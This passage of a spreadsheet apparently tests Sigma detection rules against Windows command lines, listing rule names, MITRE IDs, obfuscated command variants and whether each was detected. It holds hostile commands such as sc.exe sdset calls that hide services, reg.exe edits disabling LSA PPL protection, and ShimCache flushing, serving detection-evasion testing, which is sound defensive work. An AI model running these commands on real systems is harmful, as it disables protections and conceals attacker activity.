      <c r="D4115" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E4115" s="44" t="inlineStr">
        <is>
          <t>sc.exe sdset AtomicService "D:(D;;SDDTWPWPLCDC;;;IU)(D;;SDDTWPWPLCDC;;;SU)(D;;SDDTWPWPLCDC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F4115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4115" s="44" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE (6c8fbee5-dee8-49bc-851d-c3142d02aa47); Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J4115" s="44" t="n"/>
      <c r="K4115" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4116" ht="15.75" customHeight="1" s="42">
      <c r="A4116" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B4116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C4116" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D4116" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E4116" s="44" t="inlineStr">
        <is>
          <t>sc.exe "sdset" BenignService "D:(D;;DCLCWPDTSD;;;IU)"</t>
        </is>
      </c>
      <c r="F4116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4116" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE (a537cfc3-4297-4789-92b5-345bfd845ad0); Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J4116" s="44" t="n"/>
      <c r="K4116" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4117" ht="15.75" customHeight="1" s="42">
      <c r="A4117" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B4117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C4117" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D4117" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E4117" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe s^dset BenignService "D:(D;;DCLCWPDTSD;;;IU)"</t>
        </is>
      </c>
      <c r="F4117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4117" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE (a537cfc3-4297-4789-92b5-345bfd845ad0); Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J4117" s="44" t="n"/>
      <c r="K4117" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4118" ht="15.75" customHeight="1" s="42">
      <c r="A4118" s="44" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B4118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C4118" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D4118" s="44" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E4118" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "sc\tstop\tBITS"</t>
        </is>
      </c>
      <c r="F4118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4118" s="44" t="n"/>
      <c r="J4118" s="44" t="n"/>
      <c r="K4118" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4119" ht="15.75" customHeight="1" s="42">
      <c r="A4119" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4119" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4119" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4119" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename "C:\\\Program Files\\\MyApp.exe" /Run /WindowState=0 /RunAs /CommandLine "cmd /c echo Hello"</t>
        </is>
      </c>
      <c r="F4119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4119" s="44" t="n"/>
      <c r="J4119" s="44" t="n"/>
      <c r="K4119" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4120" ht="15.75" customHeight="1" s="42">
      <c r="A4120" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4120" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4120" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4120" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename C:\\Program Files\\MyApp.exe -Run -WindowState 0 -RunAs -CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F4120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4120" s="44" t="n"/>
      <c r="J4120" s="44" t="n"/>
      <c r="K4120" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4121" ht="15.75" customHeight="1" s="42">
      <c r="A4121" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4121" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4121" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4121" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename C:\Program Files\MyApp.exe /Run /WindowState0 /RunAs /CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F4121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4121" s="44" t="n"/>
      <c r="J4121" s="44" t="n"/>
      <c r="K4121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4122" ht="15.75" customHeight="1" s="42">
      <c r="A4122" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4122" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4122" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4122" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /Run /EXEFilename C:\Program Files\MyApp.exe /WindowState 0 /RunAs /CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F4122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4122" s="44" t="n"/>
      <c r="J4122" s="44" t="n"/>
      <c r="K4122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4123" ht="15.75" customHeight="1" s="42">
      <c r="A4123" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4123" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4123" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4123" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename %PROGRAMFILES%\MyApp.exe /Run /WindowState 0 /RunAs /CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F4123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4123" s="44" t="n"/>
      <c r="J4123" s="44" t="n"/>
      <c r="K4123" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4124" ht="15.75" customHeight="1" s="42">
      <c r="A4124" s="44" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B4124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C4124" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D4124" s="44" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E4124" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename C:\\Program Files\\AdvancedRun\\example.exe -CommandLine arg1 arg2 /RunAs 11</t>
        </is>
      </c>
      <c r="F4124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4124" s="44" t="n"/>
      <c r="J4124" s="44" t="n"/>
      <c r="K4124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4125" ht="15.75" customHeight="1" s="42">
      <c r="A4125" s="44" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B4125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C4125" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D4125" s="44" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E4125" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename C:\\Program Files\\AdvancedRun\\example.exe /RunAs 4 arg1 arg2</t>
        </is>
      </c>
      <c r="F4125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4125" s="44" t="n"/>
      <c r="J4125" s="44" t="n"/>
      <c r="K4125" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4126" ht="15.75" customHeight="1" s="42">
      <c r="A4126" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C4126" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D4126" s="44" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E4126" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\\Temp\\test.jpg" /f</t>
        </is>
      </c>
      <c r="F4126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4126" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J4126" s="44" t="n"/>
      <c r="K4126" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4127" ht="15.75" customHeight="1" s="42">
      <c r="A4127" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C4127" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D4127" s="44" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E4127" s="44" t="inlineStr">
        <is>
          <t>reg.exe /add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Temp\test.jpg" /f</t>
        </is>
      </c>
      <c r="F4127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4127" s="44" t="n"/>
      <c r="J4127" s="44" t="n"/>
      <c r="K4127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4128" ht="15.75" customHeight="1" s="42">
      <c r="A4128" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C4128" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D4128" s="44" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E4128" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Temp\test.jpg"</t>
        </is>
      </c>
      <c r="F4128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4128" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J4128" s="44" t="n"/>
      <c r="K4128" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4129" ht="15.75" customHeight="1" s="42">
      <c r="A4129" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C4129" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D4129" s="44" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E4129" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v Wallpaper /d "C:\Temp\test.jpg" /t REG_SZ /f</t>
        </is>
      </c>
      <c r="F4129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4129" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J4129" s="44" t="n"/>
      <c r="K4129" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4130" ht="15.75" customHeight="1" s="42">
      <c r="A4130" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4130" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C4130" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D4130" s="44" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E4130" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "%TEMP%\test.jpg" /f</t>
        </is>
      </c>
      <c r="F4130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4130" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J4130" s="44" t="n"/>
      <c r="K4130" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4131" ht="15.75" customHeight="1" s="42">
      <c r="A4131" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C4131" s="44" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D4131" s="44" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E4131" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c Rundll32.exe apphelp.dll,ShimF^lushCache</t>
        </is>
      </c>
      <c r="F4131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4131" s="44" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J4131" s="44" t="n"/>
      <c r="K4131" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4132" ht="15.75" customHeight="1" s="42">
      <c r="A4132" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C4132" s="44" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D4132" s="44" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E4132" s="44" t="inlineStr">
        <is>
          <t>Rundll32.exe kernel32.dll,#00046</t>
        </is>
      </c>
      <c r="F4132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4132" s="44" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702); Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702); Potential Obfuscated Ordinal Call Via Rundll32 (43fa5350-db63-4b8f-9a01-789a427074e1); Potential Obfuscated Ordinal Call Via Rundll32 (43fa5350-db63-4b8f-9a01-789a427074e1)</t>
        </is>
      </c>
      <c r="J4132" s="44" t="n"/>
      <c r="K4132" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4133" ht="15.75" customHeight="1" s="42">
      <c r="A4133" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_non_priv_reg_or_ps</t>
        </is>
      </c>
      <c r="C4133" s="44" t="inlineStr">
        <is>
          <t>Non-privileged Usage of Reg or Powershell</t>
        </is>
      </c>
      <c r="D4133" s="44" t="inlineStr">
        <is>
          <t>8f02c935-effe-45b3-8fc9-ef8696a9e41d</t>
        </is>
      </c>
      <c r="E4133" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg\tadd \"HKLM\System\CurrentControlSet\Services\TEST-HOST\" /v ImagePath /t REG_EXPAND_SZ /d \"C:\Temp\test.txt\" /f"</t>
        </is>
      </c>
      <c r="F4133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4133" s="44" t="n"/>
      <c r="J4133" s="44" t="n"/>
      <c r="K4133" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4134" ht="15.75" customHeight="1" s="42">
      <c r="A4134" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_non_priv_reg_or_ps</t>
        </is>
      </c>
      <c r="C4134" s="44" t="inlineStr">
        <is>
          <t>Non-privileged Usage of Reg or Powershell</t>
        </is>
      </c>
      <c r="D4134" s="44" t="inlineStr">
        <is>
          <t>8f02c935-effe-45b3-8fc9-ef8696a9e41d</t>
        </is>
      </c>
      <c r="E4134" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set ACTION=add&amp;&amp; reg %ACTION% \"HKLM\System\CurrentControlSet\Services\TEST-HOST\" /v ImagePath /t REG_EXPAND_SZ /d \"C:\Temp\test.txt\" /f"</t>
        </is>
      </c>
      <c r="F4134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4134" s="44" t="n"/>
      <c r="J4134" s="44" t="n"/>
      <c r="K4134" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4135" ht="15.75" customHeight="1" s="42">
      <c r="A4135" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_vboxdrvinst_execution</t>
        </is>
      </c>
      <c r="C4135" s="44" t="inlineStr">
        <is>
          <t>Suspicious VBoxDrvInst.exe Parameters</t>
        </is>
      </c>
      <c r="D4135" s="44" t="inlineStr">
        <is>
          <t>b7b19cb6-9b32-4fc4-a108-73f19acfe262</t>
        </is>
      </c>
      <c r="E4135" s="44" t="inlineStr">
        <is>
          <t>VBoxDrvInst.exe ^d^r^i^v^e^r executeinf C:\path\to\file.inf</t>
        </is>
      </c>
      <c r="F4135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4135" s="44" t="n"/>
      <c r="J4135" s="44" t="n"/>
      <c r="K4135" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4136" ht="15.75" customHeight="1" s="42">
      <c r="A4136" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B4136" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_vboxdrvinst_execution</t>
        </is>
      </c>
      <c r="C4136" s="44" t="inlineStr">
        <is>
          <t>Suspicious VBoxDrvInst.exe Parameters</t>
        </is>
      </c>
      <c r="D4136" s="44" t="inlineStr">
        <is>
          <t>b7b19cb6-9b32-4fc4-a108-73f19acfe262</t>
        </is>
      </c>
      <c r="E4136" s="44" t="inlineStr">
        <is>
          <t>VBoxDrvInst.exe "driver" "executeinf" C:\path\to\file.inf</t>
        </is>
      </c>
      <c r="F4136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4136" s="44" t="n"/>
      <c r="J4136" s="44" t="n"/>
      <c r="K4136" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4137" ht="15.75" customHeight="1" s="42">
      <c r="A4137" s="44" t="inlineStr">
        <is>
          <t>t1562.010</t>
        </is>
      </c>
      <c r="B4137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_ppl_protection_disabled</t>
        </is>
      </c>
      <c r="C4137" s="44" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D4137" s="44" t="inlineStr">
        <is>
          <t>8c0eca51-0f88-4db2-9183-fdfb10c703f9</t>
        </is>
      </c>
      <c r="E4137" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /d 0 /f</t>
        </is>
      </c>
      <c r="F4137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4137" s="44" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE (8c0eca51-0f88-4db2-9183-fdfb10c703f9)</t>
        </is>
      </c>
      <c r="J4137" s="44" t="n"/>
      <c r="K4137" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4138" ht="15.75" customHeight="1" s="42">
      <c r="A4138" s="44" t="inlineStr">
        <is>
          <t>t1562.010</t>
        </is>
      </c>
      <c r="B4138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_ppl_protection_disabled</t>
        </is>
      </c>
      <c r="C4138" s="44" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D4138" s="44" t="inlineStr">
        <is>
          <t>8c0eca51-0f88-4db2-9183-fdfb10c703f9</t>
        </is>
      </c>
      <c r="E4138" s="44" t="inlineStr">
        <is>
          <t>reg.exe add /v RunAsPPL /d 0 HKLM\SYSTEM\CurrentControlSet\Control\Lsa</t>
        </is>
      </c>
      <c r="F4138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4138" s="44" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE (8c0eca51-0f88-4db2-9183-fdfb10c703f9)</t>
        </is>
      </c>
      <c r="J4138" s="44" t="n"/>
      <c r="K4138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4139" ht="15.75" customHeight="1" s="42">
      <c r="A4139" s="44" t="inlineStr">
        <is>
          <t>t1562.010</t>
        </is>
      </c>
      <c r="B4139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_ppl_protection_disabled</t>
        </is>
      </c>
      <c r="C4139" s="44" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D4139" s="44" t="inlineStr">
        <is>
          <t>8c0eca51-0f88-4db2-9183-fdfb10c703f9</t>
        </is>
      </c>
      <c r="E4139" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /d 0</t>
        </is>
      </c>
      <c r="F4139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4139" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4139" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4139" s="44" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE (8c0eca51-0f88-4db2-9183-fdfb10c703f9)</t>
        </is>
      </c>
      <c r="J4139" s="44" t="n"/>
      <c r="K4139" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4140" ht="15.75" customHeight="1" s="42">
      <c r="A4140" s="44" t="inlineStr">
        <is>
          <t>t1562.010</t>
        </is>
      </c>
      <c r="B4140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_ppl_protection_disabled</t>
